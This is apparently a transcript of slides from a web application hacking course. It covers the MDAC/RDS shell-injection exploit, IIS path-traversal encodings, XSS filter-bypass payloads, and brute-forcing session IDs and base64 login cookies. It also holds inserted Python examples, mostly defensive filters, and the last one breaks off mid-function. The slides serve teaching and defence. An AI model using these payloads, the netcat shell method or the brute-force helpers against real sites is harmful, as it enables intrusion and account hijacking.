(Diagram: the client sends an HTTP request (cleartext or SSL) through the firewall to the web server (Apache, IIS, Netscape, etc.), which runs the web app through plugins (Perl, C/C++, JSP, etc.) and reaches the SQL database over a database connection (ADO, ODBC, etc.); the HTTP reply carries HTML, JavaScript, VBScript, etc.)

48 The MDAC Attack
Vulnerability with Microsoft Data Access Components (msadcs.dll)
MDAC allows remote users to perform SQL queries without authentication
Only the DSN needs to be known
SQL queries can be crafted to execute arbitrary commands
Data Source Name (DSN)
DSN = "DRIVER={Microsoft Access Driver (*.mdb)};dbq=\\*.mdb;"

This will still invoke the Access (Jet) driver, and tell it to directly use \\*.mdb. No UID. No password. The dbq parameter in the connection setup must be specified and needs to be a valid file. This means we need a valid *.mdb file to connect to. One that may exist is btcustmr.mdb, which is installed to %systemroot%\help\iis\htm\tutorial\ by default with Option Pack 4. The Perl exploit script searches for the correct drive and directory where this file resides.

49 The MDAC Attack
(Diagram: on the client, Internet Explorer or VB.exe with the RDS Data Control and RDS Data Space; on the server, IIS with msadcs.dll, the RDS Data Factory, Custom Business Objects and ASP (ADO) over OLE DB, the ODBC Provider, the Jet Provider and Jet 3.5; the Remote Data Service travels as URL/HTML between the two.)

RDS allows end-users to bring one or more disconnected ActiveX Data Object (ADO) recordsets from a remote server to a client computer using the HTTP, HTTPS, or DCOM protocols. In order for RDS to work properly, it must have the following key components installed: On the client, RDS DataControl and RDS DataSpace are installed when you install Microsoft Internet Explorer 4.0 and higher. On the server, RDS DataFactory, Custom Business Objects and ASP web pages are installed as part of the NT 4 Option Pack, or via the MDAC redistribution file MDAC_TYP.EXE, or with base Windows 2000 Server. Microsoft Jet Database Engine, a required component for database access to data stored in an Access back-end database (.mdb), is installed when you install MDAC. RDS is basically a way to do remote data queries to a server. This is done over the web. Basically your client app communicates via HTTP to the /msadc/msadcs.dll on your server. The msadcs.dll exposes the RDSServer.DataFactory object, better known as the AdvancedDataFactory. Now AdvancedDataFactory only has four methods, so we're kind of limited on what we can do. We can CreateRecordSet, Query, SubmitChanges, and ConvertToString. Query and SubmitChanges require a valid database to work upon. When you do a 'typical' or better install with Option Pack 4, a particular .mdb is installed (btcustmr.mdb) which is installed to %systemroot%\help\iis\htm\tutorial\. Upon execution, the script will send a raw GET request to /msadc/msadcs.dll via HTTP/1.0 on the victim’s webserver. If it exists, the script will proceed to search for the existence of the btcustmr.mdb database using a set of combinations to locate the correct drive and directory. If this is successful, the script will save the true path to a file named rds.save on the local computer and proceed to creating a new DSN via /scripts/tools/newdsn.exe.

50 The MDAC Attack
Exploit: Gain Administrator Privileges on NT!
The RDS request in Perl:
$query="Select * from Customers where City='|shell(\"$command\")|'";
$dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" . $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}

dsn (data source name): dbq is the file location, where $p1 and $p2 represent variables in the Perl exploit script that search for the drive and directory that contains \\help\\iis\\htm\\tutorial\\btcustmr.mdb. The pipe character or vertical bar is a reserved character for the Jet database engine. It tells the Jet database engine to evaluate the identifier before evaluating the rest of the expression. Therefore, the Jet database engine inserts the value of the identifier in the expression, and then evaluates it. In SQL, strings must be enclosed in single quotes. If a string includes a single quote it must be escaped by doubling it up. The Jet engine extends this by allowing strings to enclose a VBA expression inside vertical bar characters in the string, like this:
select 'lil'' string | 6+7 | with number' as foo from table;
This will produce a recordset containing one field with the value "lil' string 13 with number" for each row of the input table. The most useful command is "shell", although this in itself cannot do redirections or pipes; cmd.exe can assist with this though. By using the shell function and running cmd.exe, an attacker can run any command on the system. However, since the pipe operator is a rather obscure character and is very poorly documented, most people don't know it's there, apparently even Microsoft programmers.
ODBC: Open Database Connectivity. ADO: ActiveX Data Objects. Some background on ODBC and DSNs: an application 'connects' to the ODBC service specifying a specific DSN to query. The DSNs are defined in the ODBC32 applet of the control panel. Each DSN is basically a description of the name of the DSN, the drivers to use (in our case, the MS Jet/Access drivers), and the location of the actual database (a .mdb file somewhere in the filesystem). We could also have DSNs that used drivers such as Oracle or MS SQL, and the location would be another server. The whole point is that you only need to know the DSN name; ODBC will take care of where and how the actual database is to be used.

51 The MDAC Attack in Action
[Diagram: mdac.pl (exploit) -> IIS 4.0, msadcs.dll -> DB; the query SELECT * FROM Customers WHERE City = '|shell($command)|' ends in a C:\>_ prompt]
1. The RDS request carries the query through msadcs.dll to the Jet database, which evaluates shell($command).
2. A tftp server is used to transfer nc.exe over to the NT IIS box.
3. A listener on port 2001 receives the connection from nc.exe.

52 The Effectiveness of Web Hacking
By default, ports 80 and 443 are usually allowed through firewalls. The open door...
A single URL string is processed by many different components.
In most cases the only defense is reliance on secure coding.
Typically the non-secure server instance is on port 80, the default port for http connections, and the secure server instance is on port 443, the default port for https connections. The "s" in https identifies it as SSL (Secure Sockets Layer) on port 443 unless otherwise noted. Since these port numbers are the standard defaults, the port number does not need to appear in the URL.
Port number: 443
Common name(s): https
Common service(s): SSL-encrypted HTTP
Service description(s): HTTP with SSL encryption
Common server(s): Apache, IIS, Zeus, Roxen
Common client(s): MSIE, Netscape, Mozilla
Common problem(s): man-in-the-middle attack (using dsniff, for example)
Encrypted options: N/A
Secure options: N/A
Firewalling recommendations: Firewalling HTTPS is rarely possible due to user backlash. However, outgoing access to port 443 from servers should be restricted if possible.
Attack detection: Attack detection is difficult since the protocol is encrypted. You must use an SSL proxy or a host-based intrusion detection system if you wish to detect attacks.
Related ports: 80

53 Missile of Death
http: // / catalog / display.asp ? pg = 1 & product = 7
[Diagram: the pieces of this one URL are parsed in turn by the Web Server, the Web app and the DB]

54 Cross Site Scripting, Why You Should Care.
XSS is not an attack on the server; it is an attack on the users of your application.
So what? Identity theft, user masquerading, reputation risk.

55 Cross Site Scripting (XSS)
Found in 98% of applications.
2 main types:
Transient (URL-based)
Sticky: script placed in a static bit of web content

56 XSS continued... Transient generally requires user interaction
What can happen? The possibilities are only restricted by the client. Cookie theft is the most common example.
"But I filter '<' and '>'": JavaScript entities need neither: &{alert('Test')};

57 Session Hijacking
HTTP is stateless, so application designers must build a way to track state.
Cookies and URL strings are the most common ways to track state.
Both are easily exploitable.

58 Session Hijacking Continued...
Generally the next thing to occur after XSS.
Examples of common session tracking issues.

59 Parameter Tampering
Programmers will store data anywhere!
URL parameters
Cookies: Cookie: p=$1.00
Hidden fields: not really hidden

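The price-in-a-cookie case on the slide, worked through in Python as an added example (this code is not from the presentation): the vulnerable handler trusts the client-supplied "p=$1.00", the hardened one only accepts a product identifier and looks the price up server-side, and an HMAC shows how to bind a hidden field when state really has to round-trip through the browser. The catalog, key and field names are constructed for the example.

```python
import hashlib
import hmac

# Constructed server-side catalog; a real application queries its database.
CATALOG = {"7": 49.99, "12": 199.00}
# Assumed server-side key for signing hidden fields; never sent to the browser.
SIGNING_KEY = b"replace-with-a-random-key-kept-on-the-server"


def vulnerable_total(form):
    """Trusts the client's price field, exactly the 'Cookie: p=$1.00' mistake.
    A tampered p=$1.00 buys the product for a dollar."""
    price = float(form["p"].lstrip("$"))
    return round(price * int(form["qty"]), 2)


def hardened_total(form):
    """The client may only name the product; the price is server data."""
    product = form["product"]
    if product not in CATALOG:
        raise ValueError("unknown product")
    qty = int(form["qty"])
    if not 1 <= qty <= 100:
        raise ValueError("quantity out of range")
    return round(CATALOG[product] * qty, 2)


def sign_fields(fields):
    """If state must travel through a hidden field, sign it so tampering is
    detectable. Keys are sorted so the encoding is unambiguous."""
    message = "&".join(f"{k}={fields[k]}" for k in sorted(fields)).encode()
    return hmac.new(SIGNING_KEY, message, hashlib.sha256).hexdigest()


def verify_fields(fields, tag):
    """Constant-time comparison; False means the hidden field was edited."""
    return hmac.compare_digest(sign_fields(fields), tag)
```

Note that signing hidden fields only detects modification; it does not stop a user from replaying an old signed value, so the server-side lookup in `hardened_total` remains the primary control.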
60 Unbound File Calls: Ye Olde ../../
Becomes an issue when it exposes important information (global.asa).
Most application languages will accept URLs as file arguments.

61 Do You Know Where Your Data is?
Building an exclusionary filter is difficult because your data is all over the place.

62 Customer Service Database
[Data flow example diagram: Internet, Orders Database, Customer Service Database, Marketing Database]

63 Designing a proper filter
Make all filters default deny.
Don't try to exclude "bad stuff".
Requires a good idea of where your data is going.
Log all filter violations.

64 Filter Bypassing is a Technique to Evade Detection by Filtering Systems.
Filter bypassing techniques come in many varieties when applied to the many facets of web application security. The general idea of the techniques described here is to bypass security measures designed to prevent certain types, amounts or values of data from being passed into a given system. Many of these techniques are highly effective when used properly and become more powerful when used in combination.

65 Most filter systems are very simple
Seven forms of ingenuity:
URL Encoded Strings
Double Hex Encoding
Unicode Encoded Strings
Long URLs
Case Sensitivity
XSS Filter-Bypass Manipulation
Null Character Injection

66 The Hex Advantage
By URL hex encoding URL strings, it may be possible to circumvent filter security systems and IDS.
/passwd can become: %2F%70%61%73%73%77%64

67 Double Hex Encoding
In September 2001, the Nimda worm spread throughout the Internet taking advantage of a Microsoft IIS vulnerability. The vulnerability was called an Escaped Character Decoding Vulnerability, which involves double hex encoding of a URL. An attacker or automated script would craft a URL so that it contained special hex-encoded sequences to exploit the vulnerability. When an unpatched, vulnerable Microsoft IIS server received the encoded URL, one round of hex decoding was performed on the path in the URL. IIS then performed a security check on the decoded URL, but afterwards performed a second round of hex decoding. This secondary decoding was the source of another vulnerability.

68 IIS Double Hex
Round 1 decoding: scripts/..%255c../winnt becomes scripts/..%5c../winnt (%25 = "%" character)
Round 2 decoding: scripts/..\../winnt
Directory path traversal is now possible using path obfuscation through double hex encoding.

69 The Unicode Slash
In UTF-8, "%c0%af" is an overlong (non-shortest-form) encoding that IIS decoded as a slash ("/"). Therefore the common IIS URL exploit scripts/..%c0%af../winnt becomes scripts/../../winnt.
Once again, directory path traversal is possible using path obfuscation through Unicode.

70 Double Slash
Using multiple directory slashes in URLs can be used to move under the radar of IDS systems while the request still functions properly.

71 Long URLs
Many systems put limits on how much data a variable can store or a system can handle. Often, if these limits are exceeded, the data will still be used but will bypass certain security considerations.

72 Case Sensitivity
Case sensitivity may play a role in many security filtering systems. Alternating case in URL parameters may be used to bypass certain restrictions.

73 Method Switching
Many web applications do not properly perform HTTP request method sanity checking. Method switching can be used to bypass IDS, logging features and CGI security mechanisms. Most web servers do not log POST data, so forensic analysis is harder to perform.
The request method GET /cgi-bin/some.cgi can become POST /cgi-bin/some.cgi

74 HTTP 1.1 Methods
The Method token indicates the method to be performed on the resource identified by the Request-URI: OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, CONNECT

75 Using your "HEAD"
The HEAD request method can be used to determine whether a particular HTTP resource is accessible without actually downloading the resource data. Scans and web application attacks can be made more effective using this technique.

76 Null Character Injection
Hex-encoded null characters (%00) can be used to thwart some security mechanisms. This happens because in the C programming language a null character designates the end of a string. So if a CGI appends ".html" to an input parameter, a %00 at the end of the supplied value will cut off the appended ".html".

77 Unicode (UTF-8) Encoded
Unicode is a universal way to represent characters. However, Unicode can also be used to circumvent security mechanisms by representing information in another fashion. Microsoft IIS has had security issues in the past while supporting Unicode.

78 URL Encoded String
The specification for URLs (RFC 1738, Dec. '94) poses a problem in that it limits the allowed characters in URLs to a limited subset of the US-ASCII character set: "...Only alphanumerics [0-9a-zA-Z], the special characters "$-_.+!*'()," [not including the quotes - ed], and reserved characters used for their reserved purposes may be used unencoded within a URL."

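The evasions on slides 65 through 78 all rely on a filter that inspects the request before the server has finished decoding it. The added Python example below (not code from the presentation) shows a "decode once, check, decode again" check in the IIS style being bypassed by double hex encoding and by the overlong-UTF-8 slash, and a default-deny check in the spirit of slide 63 that canonicalizes first (repeated percent-decoding, overlong UTF-8 folding, NUL truncation, backslash and double-slash folding, case folding, ".." resolution), matches an allowlist, and logs every violation. The allowlist of directories is an assumption of the example.

```python
import logging
import re
from urllib.parse import unquote_to_bytes

log = logging.getLogger("webfilter")

# Assumed allowlist for this example: only these directories and ordinary
# filename characters are served; everything else is denied and logged.
ALLOWED_PATH = re.compile(r"^/(scripts|catalog|help)/[a-z0-9_./-]+$")


def decode_overlong_utf8(data: bytes) -> bytes:
    """Fold 2-byte overlong UTF-8 sequences (e.g. C0 AF -> '/') into the ASCII
    byte they encode. A conforming decoder rejects these; vulnerable IIS
    accepted them, so the filter must see what the server will see.
    Longer overlong forms (E0 80 AF, F0 80 80 AF) are not handled here."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def resolve_segments(text: str):
    """Apply '.' and '..' to the path. Returns (canonical_path, escaped_root)."""
    parts, escaped = [], False
    for seg in text.split("/"):
        if seg == "..":
            if parts:
                parts.pop()
            else:
                escaped = True
        elif seg not in ("", "."):
            parts.append(seg)
    return "/" + "/".join(parts), escaped


def canonicalize(path: str):
    """Undo the evasions before any security decision: repeat %XX decoding
    until stable (double hex), fold overlong UTF-8 (the Unicode slash),
    truncate at NUL (null injection), treat '\\' as '/', collapse '//' runs,
    lower-case (case sensitivity), then resolve '..'."""
    raw = path.encode("latin-1")
    for _ in range(4):                      # bounded; attackers can nest deeper
        decoded = decode_overlong_utf8(unquote_to_bytes(raw))
        if decoded == raw:
            break
        raw = decoded
    text = raw.split(b"\x00", 1)[0].decode("latin-1")
    text = re.sub(r"/{2,}", "/", text.replace("\\", "/").lower())
    return resolve_segments(text)


def naive_check(path: str) -> bool:
    """The IIS round-1 mistake: decode once, check, and let a later decode
    reintroduce the traversal. True means the request is let through."""
    once = unquote_to_bytes(path.encode("latin-1")).decode("latin-1")
    return not resolve_segments(once)[1]


def default_deny_check(path: str) -> bool:
    """Canonicalize first, allow only what matches, log every denial."""
    canon, escaped = canonicalize(path)
    allowed = (not escaped) and ALLOWED_PATH.match(canon) is not None
    if not allowed:
        log.warning("filter violation: %r canonicalizes to %r", path, canon)
    return allowed
```

Run `naive_check("scripts/..%255c../winnt")` and the double-encoded request is waved through because "..%5c.." is not a ".." segment after one decode; `default_deny_check` on the same input sees "/winnt" with the web root escaped and denies it.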
79 XSS Filter-Bypass Manipulation
This technique is used to pass various types of client-side scripting language through implemented security filters. The idea is to achieve client-side execution of a client-side script. There are several techniques used to perform this attack.

80 Hammer the Filters
Submit all the raw HTML tags you can find, and then view the output. Combine HTML with tag attributes such as SRC, STYLE, HREF and OnXXX (JavaScript event handlers). This will show what HTML is allowed, what the changes were, and possibly dangerous HTML that can be exploited.

81 SRCing the Protocol
Using the "javascript" protocol in an HTML source attribute:
<IMG SRC="javascript:js_expression">
<IMG SRC="javascript:alert('test');">

82 Alternate Protocol SRCing
Same technique as the previous one; however, using the protocols "livescript" and "mocha" yields the same effect.
<IMG SRC="livescript:js_expression">
<IMG SRC="mocha:alert('test');">

83 Decimal HTML Entities
A variation on the previous techniques: decimal HTML entities between the protocol characters can be used to bypass filters, yet still execute JavaScript.
<IMG SRC="java&#09;script:js_expression">
&#09; &#10; &#11; &#12; &#13; (tab, newline, vertical tab, form feed, carriage return) have all been seen to work.

84 Hex HTML Entities
Another variation on the previous example: hex HTML entities may also be used to bypass filter restrictions, yet execute JavaScript.
<IMG SRC="java&#x09;script:js_expression">

85 Padding HTML Entities
Padding HTML entities with "0"s may also be used to bypass the filters, yet still execute JavaScript.
<IMG SRC="java&#0000009;script:js_expression">

86 STYLE JavaScript Type
Changing the MIME type on a "style" tag may be used to execute JavaScript.
<style TYPE="text/javascript"> JS_EXPRESSION </style>
For example: alert(document.domain);

87 STYLE JavaScript X-Type
A variation on the previous example: by using the "application/x-javascript" MIME type, the filters may be bypassed.
<STYLE TYPE="application/x-javascript"> alert('JavaScript has been Executed'); </STYLE>

88 STYLE JavaScript Import
The @import feature in CSS may be used to perform JavaScript protocol SRCing.
<style TYPE="text/css"> @import url(javascript:alert('Javascript is executed')); </style>

89 STYLE URL Import
The @import feature in CSS can also be used to import JavaScript from another HTTP resource.
<STYLE type=text/css> @import url( </STYLE>

90 LINK Style Sheet
The LINK tag can be used to import JavaScript from a remote HTTP resource.
<LINK REL=STYLESHEET TYPE="text/javascript" SRC="javascript_path.js">

91 Style Left Expression
A few CSS features used together to execute JavaScript (Internet Explorer's CSS expression()):
<P STYLE="left:expression(eval('alert(\'JavaScript is executed\');window.close()'))">

92 Remote SRCing
A few HTML tags, such as LAYER, ILAYER, FRAME and IFRAME, can be used to SRC in JavaScript from remote resources.
<LAYER SRC="js.html"></LAYER>

93 ...AND CURLY
JavaScript entities: the syntax must be exact.
<IMG SRC="&{javascript_expression};">
<IMG SRC="&{alert('alert')};">

94 Dangerous HTML Tags
"All HTML is to be considered dangerous, but these tags are the most insidious."
<APPLET> <BODY> <EMBED> <FRAME> <FRAMESET> <HTML> <IFRAME> <IMG> <LAYER> <ILAYER> <META> <OBJECT> <SCRIPT> <STYLE>

95 Dangerous HTML Attributes
(HTML tags with these attributes.)
SRC LOWSRC STYLE HREF

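Slides 56 and 79 through 95 list filter bypasses that all survive a naive blacklist because the filter and the browser disagree about what the attribute value means. The added Python example below (not from the presentation) canonicalizes an attribute value the way a lenient browser of that era did, decoding numeric entities (decimal, hex, zero-padded, semicolon optional) and dropping the control characters that were ignored inside "java<TAB>script:", then shows both a blacklist check that catches the tricks from the slides (javascript/livescript/mocha SRCing, &{...} entities, CSS expression(), @import url(javascript:...)) and the default-deny allowlist that is the better control. The vbscript scheme and the extra attribute names are assumptions of the example.

```python
import re
from html import unescape

# Schemes named on slides 81-82; vbscript is added as an assumption.
SCRIPT_SCHEMES = {"javascript", "livescript", "mocha", "vbscript"}
# Slide 95's attributes; "background" and "dynsrc" are added as assumptions.
URL_ATTRS = {"src", "lowsrc", "href", "style", "background", "dynsrc"}


def decode_entities(value: str) -> str:
    """Decode numeric and named HTML entities the way a lenient browser does:
    decimal or hex, leading zeros allowed (&#0000009;), semicolon optional.
    html.unescape implements exactly those rules."""
    return unescape(value)


def canonical_scheme(value: str):
    """The scheme a browser acts on once entities are decoded and the
    control/whitespace characters (0x00-0x20) that old browsers ignored
    inside the scheme are dropped. None for relative URLs."""
    text = "".join(ch for ch in decode_entities(value) if ord(ch) > 0x20)
    m = re.match(r"([a-z][a-z0-9+.-]*):", text, re.I)
    return m.group(1).lower() if m else None


def is_dangerous_value(value: str) -> bool:
    """Blacklist view: flag the tricks from slides 81-93 in one attribute value."""
    decoded = decode_entities(value)
    if canonical_scheme(value) in SCRIPT_SCHEMES:          # javascript: and friends
        return True
    if re.search(r"&\{.*?\}", decoded):                      # &{js_expression};
        return True
    if re.search(r"expression\s*\(", decoded, re.I):         # left:expression(...)
        return True
    for m in re.finditer(r"url\s*\(\s*['\"]?([^)'\"]+)", decoded, re.I):
        if canonical_scheme(m.group(1)) in SCRIPT_SCHEMES:  # @import url(javascript:...)
            return True
    return False


def allow_url(value: str) -> bool:
    """Default-deny view: accept only http(s) or relative URLs made of ordinary
    URL characters after decoding. Quotes, parentheses and braces are not
    needed in a legitimate SRC/HREF and are what the bypasses rely on."""
    if canonical_scheme(value) not in (None, "http", "https"):
        return False
    decoded = decode_entities(value)
    return re.fullmatch(r"[A-Za-z0-9._~:/?#@!$&*+,;=%-]+", decoded) is not None


def check_attribute(name: str, value: str) -> bool:
    """True when the attribute may be emitted unchanged."""
    if name.lower() not in URL_ATTRS:
        return True
    if name.lower() == "style":
        return not is_dangerous_value(value)
    return allow_url(value) and not is_dangerous_value(value)
```

The blacklist keeps growing (the slides alone list fourteen variants); the allowlist in `allow_url` rejects every one of them with a single rule, which is the slide 63 point applied to XSS.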
96 Web Application Logins

97 Traditional Brute Force
guest
Admin
123123
Password
etc.

98 Session ID Overview
HTTP is a stateless protocol.
Rather than make a user authenticate on each click in a web application, a sense of "state" is created.
To maintain state, developers usually use a shared string, token or secret between HTTP client and server.
Essentially, authentication data (username/password) is exchanged for a "Session ID".

99 Web State Attacks
Session Replay: a traditional replay attack in the cryptographic sense is one in which a valid data transmission is maliciously or fraudulently repeated, either by the originator or by an adversary who intercepts the data and retransmits it.
Session Hijacking: seizing control of a legitimate user's web application session while that user is "logged in" to the application.

100 Session ID
A Session ID should IN THEORY be just as secure as the username/password.

101 Session ID Overview
While it is generally clear that username/password pairs are authentication data and therefore sensitive, it is not generally understood that session IDs are just as sensitive because of their frequent use for authentication. See RFC 2964 (Use of HTTP State Management).

102 Session ID Overview
Session IDs are commonly stored in cookies and/or URLs, and in hidden fields of web pages (or some combination).
The Session ID is generated by the WEB SERVER (IIS, etc.) when the user first hits the site, or by the WEB APPLICATION (ATG Dynamo, Apache Tomcat, BEA WebLogic, .jsp, .asp, Perl, etc.) when the user logs in.

103 Cookie Refresher
Sometimes cookies are set to expire (i.e. be deleted) upon closing the browser; these are typically called "session cookies" or "non-persistent" cookies.
Persistent cookies last beyond a user's session (e.g. a "Remember Me" option).
Persistent cookies are usually stored on the user's hard drive in a location that depends on the operating system and browser (e.g. C:\Program Files\Netscape\Users\username\cookies.txt for Netscape and C:\Documents and Settings\username\Cookies for IE on Win2K).

104 Cookie Refresher
Cookie Refresher (RFC 2965): the seven fields of a stored cookie entry
1.) domain: The website domain that created, and that can read, the variable.
2.) flag: A TRUE/FALSE value indicating whether all machines within a given domain can access the variable.
3.) path: Pathname of the URL(s) capable of accessing the cookie from the domain.
4.) secure: A TRUE/FALSE value indicating whether an SSL connection with the domain is needed to access the variable.
5.) expiration: The Unix time at which the variable expires. Unix time is the number of seconds since 00:00:00 GMT on Jan 1, 1970. Omitting the expiration date tells the browser to store the cookie only in memory; it is erased when the browser is closed. (The example value expires July 27, 2006.)
6.) name: The name of the Session ID variable (in this case Apache).
7.) value: The value of the Session ID variable (the slide's example value).
Example entry, fields 1 to 7 (only partly preserved in the transcript): FALSE / Apache

105 Cookie Stored Session ID Examples
Fields: domain, flag, path, secure, expiration, name, value
.starwars.com TRUE / FALSE Wookie-Cookie 13fe8fff4799f27dcf19c959dafa8437
. TRUE /rc FALSE sauidp p DCC F75FEF2
.ebay.com TRUE / FALSE lucky8 694036
.amazon.com FALSE / session-id
.yahoo.com TRUE / FALSE B 3qpaarsu48dai&b=2
.yahoo.com TRUE / FALSE I ir=9p&in=4aweec66&i1=AFABCl
.yahoo.com TRUE / FALSE PU t=1

106 URL Stored Session ID

107 Session IDs in HTML Hidden Fields
<FORM METHOD=POST ACTION="/cgi-bin/bankonline.cgi">
<input type="hidden" name="sessionID" value="abcde1234">
<input type="hidden" name="useraccount" value=" ">
<input type="submit" name="Access My Bank Information">
</form>

108 Session ID Security Overview
Session ID security is a microcosm of web application security.
Web application security cuts through many different aspects of an organization's information security infrastructure.

109 An Example: Brute Forcing Session IDs in URLs
Dear Terry Gillette,
An Anonymous Admirer has sent you a greeting card from 123Greetings.com, a FREE service committed to keeping people in touch. To see your greeting card, choose from any of the following options, whichever works best for you.
Method 1: Just click on the following Internet address (if that doesn't work for you, copy & paste the address into your browser's address box.)

110 An Example: Brute Forcing Session IDs in URLs
Once we associate the date we sent these electronic cards, July 25 at 12:21 PST, with the session ID, we can eliminate some more entropy from it. Notice that we are then left with five incrementing "random" digits at the end of the URL.

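The reasoning on the previous two slides, as an added Python example that is not part of the presentation: IDs that embed the send time leave only the trailing counter to guess, and because there is no lockout the attacker simply walks the counter around the values already observed. The session IDs, the year and the ID layout (MMDDHHMM followed by a five-digit counter) are constructed to match the slide's description; `is_valid` stands in for an HTTP request to the card URL.

```python
from datetime import datetime

# Constructed IDs modelled on slide 110: "MMDDHHMM" of the send time followed
# by a five-digit counter. Not real 123Greetings IDs; the year is assumed.
SENT_AT = datetime(2001, 7, 25, 12, 21)
OBSERVED = ["0725122141023", "0725122141027", "0725122141031"]


def split_id(session_id: str, sent_at: datetime):
    """Peel off the part of the ID that the send time explains; what is left
    is the only part an attacker still has to guess."""
    stamp = sent_at.strftime("%m%d%H%M")
    if not session_id.startswith(stamp):
        raise ValueError("ID does not embed the send time as assumed")
    return stamp, session_id[len(stamp):]


def analyze(ids, sent_at=SENT_AT):
    """Compare the apparent key space (every digit random) with the effective
    one (only the counter unknown)."""
    stamp, first_tail = split_id(ids[0], sent_at)
    tails = [int(split_id(i, sent_at)[1]) for i in ids]
    width = len(first_tail)
    return {
        "prefix": stamp,
        "tail_width": width,
        "apparent_space": 10 ** len(ids[0]),
        "effective_space": 10 ** width,
        "tail_range": (min(tails), max(tails)),
    }


def candidates(ids, window=50, sent_at=SENT_AT):
    """IDs handed out around the same time as the ones we were sent; cards
    sent to other people in that window are the targets."""
    info = analyze(ids, sent_at)
    lo, hi = info["tail_range"]
    width = info["tail_width"]
    last = min(hi + window, 10 ** width - 1)
    for tail in range(max(0, lo - window), last + 1):
        yield f"{info['prefix']}{tail:0{width}d}"


def brute_force(ids, is_valid, window=50, sent_at=SENT_AT):
    """Try each candidate until one is accepted. `is_valid` stands in for a GET
    of the card URL returning the card rather than an error page (no lockout
    ever interrupts this). Returns (hit_or_None, attempts)."""
    attempts = 0
    for cand in candidates(ids, window, sent_at):
        attempts += 1
        if is_valid(cand):
            return cand, attempts
    return None, attempts


def seconds_to_exhaust(space: int, requests_per_second: float) -> float:
    """Worst-case time to walk the whole effective key space."""
    return space / requests_per_second
```

With three observed IDs the apparent space of 10^13 collapses to 10^5, and a window of 50 around the observed counters finds a neighbouring card in a few dozen requests.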
111 An Example: Brute Forcing Session IDs in URLs
AUTOMATED DEMO!

112 Why Brute Forcing Web Session IDs is Bad
Can result in an online user's web application account being hijacked, or loss of privacy.
Easy to exploit: unlike the typical login scenario, there is no failed-login lockout.
Prevalent disclosure among security mailing lists.
Typical security solutions (firewalls, IDS, etc.) do nothing to detect these attacks: log data is usually not that detailed, and IDS is not well developed for web application attacks.
SSL (server side) does nothing to protect against these attacks.

113 In the News
"Privacy hole found in Verizon Wireless Web site", Computerworld, Sept 6, 2001.

114 URL Example: Brute Forcing Register.com
Thank you for using register.com's Domain Manager. To change or re-enter your password, please copy and paste the URL below into the "Location" or "Address" field of your web browser and hit the 'Enter' key on your keyboard.
Note: If your program supports HTML, you may be able to click on the link below.
Note: The above link will expire within three days.

115 Example 2: Brute Forcing Web Session IDs

116 URL Example: Brute Forcing Dfilm.com
-----Original Message-----
From:
Sent: Monday, July 01, :38 PM
To:
Subject: D.FILM Digital Movie for Dave
Dave created a digital movie for you! You can view it at the following URL:
Cheers, Dave and DFILM. Be sure to check out the web site at

117 URL Example: Brute Forcing Dfilm.com
No privacy for other users' creations.

118 URL Example: Sendomatic.com

119 URL Example: Sendomatic.com
View other people's events. Crash a party, edit an event, cancel an event, etc.

120 Cookie Example: Freeservers.com

121 Cookie Example: Freeservers.com
LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM0;
Base64-decode the string: testing123.itgo.com:1231234 (username:password)
Next, automate it with a Perl exploit by feeding encoded strings into the cookie.

122 Cookie Example: Freeservers.com
%perl freeservershack.pl
trying test
trying test123
trying
trying
Cracked it! The password to testing123.itgo.com is 123123
GET
User-Agent: Mozilla/4.75 [en] (Windows NT 5.0; U)
Cookie: LOGIN=dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM%3D
Cookie2: $Version=1
%

123 Cookie Example: Freeservers.com
Or a much longer way: use the brute forcer on every single cookie character combination.

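An added Python example (not the presentation's Perl script) that ties slides 104, 105 and 121 through 123 together: it parses the seven-field cookies.txt format described on slide 104, decodes a Freeservers-style LOGIN cookie to its host:password content, re-encodes guesses the way the brute forcer feeds them into the cookie, and audits the parsed entries for the "transmitted in the clear" and persistence problems. The cookie file content is constructed for the example; `accepts` stands in for sending the Cookie header and checking the response.

```python
import base64
from datetime import datetime, timezone

# Constructed cookies.txt content in the seven-field Netscape format of slide
# 104, with values modelled on slides 105 and 121. Nothing here is real.
COOKIE_FILE = (
    ".starwars.com\tTRUE\t/\tFALSE\t1154000000\tWookie-Cookie\t"
    "13fe8fff4799f27dcf19c959dafa8437\n"
    "testing123.itgo.com\tFALSE\t/\tFALSE\t0\tLOGIN\t"
    "dGVzdGluZzEyMy5pdGdvLmNvbToxMjMxMjM=\n"
)
FIELDS = ("domain", "flag", "path", "secure", "expires", "name", "value")


def parse_cookie_file(text: str):
    """Parse Netscape cookies.txt lines into dicts. An expiry of 0 means a
    non-persistent (session) cookie that lives only in browser memory."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) != len(FIELDS):
            raise ValueError(f"expected 7 fields, got {len(parts)}: {line!r}")
        row = dict(zip(FIELDS, parts))
        row["flag"] = row["flag"] == "TRUE"
        row["secure"] = row["secure"] == "TRUE"
        expires = int(row["expires"])
        row["expires"] = (
            datetime.fromtimestamp(expires, timezone.utc) if expires else None
        )
        rows.append(row)
    return rows


def decode_login_cookie(value: str):
    """Freeservers-style LOGIN cookie: base64 of 'host:password'."""
    raw = base64.b64decode(value, validate=True).decode("ascii")
    host, sep, password = raw.partition(":")
    if not sep:
        raise ValueError("cookie does not contain host:password")
    return host, password


def encode_login_cookie(host: str, password: str) -> str:
    return base64.b64encode(f"{host}:{password}".encode("ascii")).decode("ascii")


def brute_force_login(host: str, wordlist, accepts):
    """Feed encoded guesses into the cookie, as the slide's Perl script does.
    `accepts(cookie_value)` stands in for sending 'Cookie: LOGIN=<value>' and
    checking whether the server serves the account page.
    Returns (password_or_None, attempts)."""
    attempts = 0
    for password in wordlist:
        attempts += 1
        if accepts(encode_login_cookie(host, password)):
            return password, attempts
    return None, attempts


def audit(rows):
    """Slide 126 checks on stored cookies: sent without the secure flag, or
    persisted to disk where another site or user can retrieve them."""
    findings = []
    for row in rows:
        if not row["secure"]:
            findings.append((row["name"], "transmitted in the clear (secure flag off)"))
        if row["expires"] is not None:
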